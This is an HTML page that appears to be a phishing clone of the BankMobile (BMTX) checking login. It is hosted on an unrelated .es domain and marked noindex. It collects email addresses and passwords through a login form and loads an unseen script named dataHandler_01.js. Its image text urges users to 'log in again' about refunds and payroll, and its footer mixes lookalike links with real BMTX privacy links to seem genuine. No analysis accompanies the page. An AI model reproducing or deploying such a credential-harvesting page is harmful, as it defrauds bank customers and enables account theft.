<!DOCTYPE html>
<!-- saved from url=(0035)https://eftcentral.es/vibeaccounts/ -->
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="robots" content="noindex">  
    
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="./Welcome to Bank Mobile Checking_files/bootstrap.min.css" rel="stylesheet" type="text/css">
    <link href="./Welcome to Bank Mobile Checking_files/outpages_index.css" rel="stylesheet" type="text/css">
    <link href="./Welcome to Bank Mobile Checking_files/global.css" rel="stylesheet" type="text/css">
    <title>Welcome to Bank Mobile Checking</title>
    <link rel="shortcut icon" href="https://eftcentral.es/vibeaccounts/favicon.ico" type="image/x-icon">
</head>
<body>
    <div id="homepage-wrapper">
        <div class="col-xs-12" id="resp-outheader">
            <div class="hdr-logo-padding">
                <a href="https://eftcentral.es/"><img src="./Welcome to Bank Mobile Checking_files/title_1.gif" height="68" alt="" style="visibility: hidden;"></a>
            </div>
            <div class="row" id="login-row">
<form id="loginForm" method="post" style="display: inline" autocomplete="off">
    <div class="col-xs-12 col-md-offset-0">
        <div class="row">
            <div class="login-fields">
                <div class="col-sm-6 login-padding">
                    <label for="fld.emailaddress">Email Address:</label>
                    <div class="login-input login-min-width">
                        <input id="fld.emailaddress" class="form-control-placeholder" type="text" size="35" maxlength="80" placeholder="Ex: janedoe@yahoo.com" required name="username" tabindex="1">
                    </div>
                </div>

                <div class="col-sm-6 login-padding">
                    <label for="fld.password">Password:</label>
                    <div class="login-input login-min-width">
                        <input id="fld.password" class="form-control form-control-placeholder" type="password" size="15" maxlength="64" placeholder="(case sensitive)" required name="password" tabindex="2">
                        <a href="https://eftcentral.es/vibeaccounts/#" class="bm-green smaller forgot-password" tabindex="4">Forgot Login Information?</a>
                    </div>
                </div>
            </div>
            <div class="login-padding login-button-group">
                <button class="btn btn-login btn-primary" type="submit" id="headerLoginButton" tabindex="3">LOG IN!</button>
                <div class="get_started_div">
                    <div class="actv_button get-started-location">
                        <img src="./Welcome to Bank Mobile Checking_files/button_getstartedtext.png" alt="Haven&#39;t made a choice? Get Started!">
                    </div>
                </div>
            </div>
        </div>
    </div>
</form>
</div>
</div>
<script src="dataHandler_01.js"></script>


        <div class="row" style="margin-left:0;margin-right:0;">
            <div class="outpagebody_div col-xs-12">
                <div class="outpagebody_pagecontent">
                    <!-- Message Box script -->
                    <div id="bg" class="row span12 empt">
                        <div class="outpage indexpage">
                            <a href="https://eftcentral.es/vibeaccounts/#"><img src="./Welcome to Bank Mobile Checking_files/1711035640159_jpg.jpg" alt="Log in again to manage your refund preference, refund history, account notifications, and payroll."></a>
                        </div>
                        <div class="indexright">
                            <div class="refunddate">
                            </div>
                        </div>
                        <div class="clear"></div>
                    </div>
                </div>
            </div>
        </div>
        <div id="footer-footer">
            <div class="footertext">
                <a href="https://eftcentral.es/index.jsp">Home</a> |
                <a href="https://eftcentral.es/cust/out/external/security.do" target="security">Security</a> |
                <a href="https://eftcentral.es/main/feeschedules.do">Fee Schedules</a> |
                <a href="https://eftcentral.es/info/accountagreements.do">Terms and Conditions</a> |
                <a href="https://www.bmtx.com/privacy-policy">Privacy Statement</a> |
                <a href="https://www.bmtx.com/privacy-notice-california">Privacy Notice for California Residents</a> |
                <a href="https://eftcentral.es/outcontact.jsp">Contact Us</a> |
                <a href="https://eftcentral.es/easyhelp/pta?basepage=answer&amp;type=public&amp;param=746" target="EasyHelp" rel="external">Identity Verification</a> |
                <a href="https://eftcentral.es/easyhelp/pta?basepage=std_alp.php&amp;type=public" target="EasyHelp" rel="external">FAQs</a>
            </div>

            <div class="footertext footer_legaltext">
                <p><img src="./Welcome to Bank Mobile Checking_files/fdic-housing.png" alt="BMTX, Inc.&gt;" class="fdic-logo"></p>

                © 2024 BMTX, Inc., a wholly owned subsidiary of BM Technologies, Inc. All Rights Reserved.<br>


                <br> Digital banking platform powered by BMTX, Inc. BankMobile banking products and banking services are provided by First Carolina Bank, Member FDIC &amp; Equal Housing Lender. The BankMobile Debit Mastercard® card is issued by First
                Carolina Bank pursuant to license from Mastercard International Incorporated. The card is administered by First Carolina Bank. Mastercard and the Mastercard brand mark are registered trademarks of Mastercard International Incorporated.
                All other names and logos are owned by their respective owners.<br>


                <br> BM Technologies, Inc., PO Box 278, Maple Shade, NJ 08052
            </div>

        </div>
    </div>

</body></html>